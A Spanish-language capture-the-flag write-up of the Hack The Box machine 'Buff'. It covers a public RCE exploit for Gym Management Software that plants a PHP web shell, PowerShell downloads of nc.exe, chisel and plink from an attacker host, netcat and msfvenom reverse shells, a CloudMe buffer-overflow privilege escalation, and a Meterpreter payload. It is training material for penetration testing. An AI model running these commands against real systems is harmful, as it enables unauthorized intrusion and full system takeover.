# Buff

**OS**: Windows \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen

- Gym Management Software 1.0 (exploit)
- CloudMe 1.11.2 (BOF)
- Portforward 

## Nmap Scan

`nmap -Pn -sV -sC -oA 10.10.10.198`

```
Nmap scan report for 10.10.10.198
Host is up (0.30s latency).
Not shown: 904 filtered ports, 95 closed ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
```

## Enumeración

Enumerando la aplicación web que se encuentra en el puerto 8080, en la parte de Contact podemos ver el nombre del software y la versión que está usando.

![1](img/1.png)

### Gym Management Software 1.0

Se puede encontrar un exploit para el software que nos permite ejecución de código remoto, lo descargamos para posteriormente explotar el servicio.

- `searchsploit "Gym Management System"`
- `searchsploit -m php/webapps/48506.py`

![2](img/2.png)

Lo que hace el exploit es subir un archivo al servidor con el nombre **kamehameha** que contiene una simple web shell en php que nos permite ejecutar comandos del sistema, entonces procedemos a ejecutar el exploit.

`python 48506.py 'http://10.10.10.198:8080/'`

![3](img/3.png)

Subiremos **nc.exe** para obtener una shell interactiva.

- `cp /usr/share/windows-resources/binaries/nc.exe .`
- `sudo python3 -m http.server 80`
- `powershell "IWR http://10.10.14.190/nc.exe -Outfile C:\xampp\htdocs\gym\upload\nc.exe"`

![4](img/4.png)

Procedemos a crear nuestra reverse shell.

- `rlwrap nc -lvnp 1234`
- `nc.exe -e cmd 10.10.14.190 1234`

![5](img/5.png)

## Escalada de Privilegios

Enumerando los procesos que están corriendo en el sistema se puede visualizar uno muy peculiar llamado **CloudMe**.

`powershell "Get-Process"`

![6](img/6.png)

Buscando exploits para el servicio se puede ver que hay unos cuantos que nos permiten escalar privilegios mediante un buffer overflow. Descargaremos el primero de ellos, ya que está corriendo **CloudMe 1.11.2**.

> También es posible obtener privilegios de Administrador con los otros exploits que se muestran.

- `searchsploit CloudMe`
- `searchsploit -m windows/remote/48389.py`

![7](img/7.png)

### CloudMe BOF

El exploit contiene un shellcode que ejecuta calc.exe el cual modificaremos por obtener una reverse shell.

![8](img/8.png)

Creamos nuestro shellcode y lo reemplazamos en el exploit.

`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.190 LPORT=4444 -f c`

![9](img/9.png)

#### Chisel portforward

Para ejecutar el exploit es necesario hacer un portforwarding, ya que el servicio está corriendo de forma local. Utilizaremos la herramienta llamada [chisel](https://github.com/jpillora/chisel/releases/tag/v1.6.0) para hacer el portforwarding.

Subimos el archivo y posteriormente lo ejecutamos.

- `sudo python3 -m http.server 80`
- `powershell "IWR http://10.10.14.190/chisel.exe -Outfile C:\xampp\htdocs\gym\upload\chisel.exe"`

![10](img/10.png)

- `./chisel server -p 5555 --reverse`
- `chisel.exe client 10.10.15.51:5555 R:8888:127.0.0.1:8888`

![11](img/11.png)

Una vez hecho nuestro direccionamiento de puertos, ponemos a la escucha nuestro netcat y ejecutamos el exploit.

- `rlwrap nc -lvnp 4444`
- `python3 48389.py`

![12](img/12.png)

## Portforward Alternativas

### PLINK

```
powershell "IWR http://10.10.14.190/plink.exe -Outfile C:\xampp\htdocs\gym\upload\plink.exe"
plink.exe -ssh -l kali -pw kali -R 10.10.14.190:8888:127.0.0.1:8888 10.10.14.190
```

### Metasploit

```
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.190 LPORT=1234 -f raw -o doom.php
powershell "IWR http://10.10.14.190/doom.php -Outfile C:\xampp\htdocs\gym\upload\doom.php"
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 10.10.14.190
set lport 1234
run
http://10.10.10.198/upload/doom.php
portfwd add -l 8888 -p 8888 -r 127.0.0.1
```

## Referencias
https://www.exploit-db.com/exploits/48506 \
https://www.exploit-db.com/exploits/44470 \
https://github.com/jpillora/chisel/releases/tag/v1.6.0 \
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html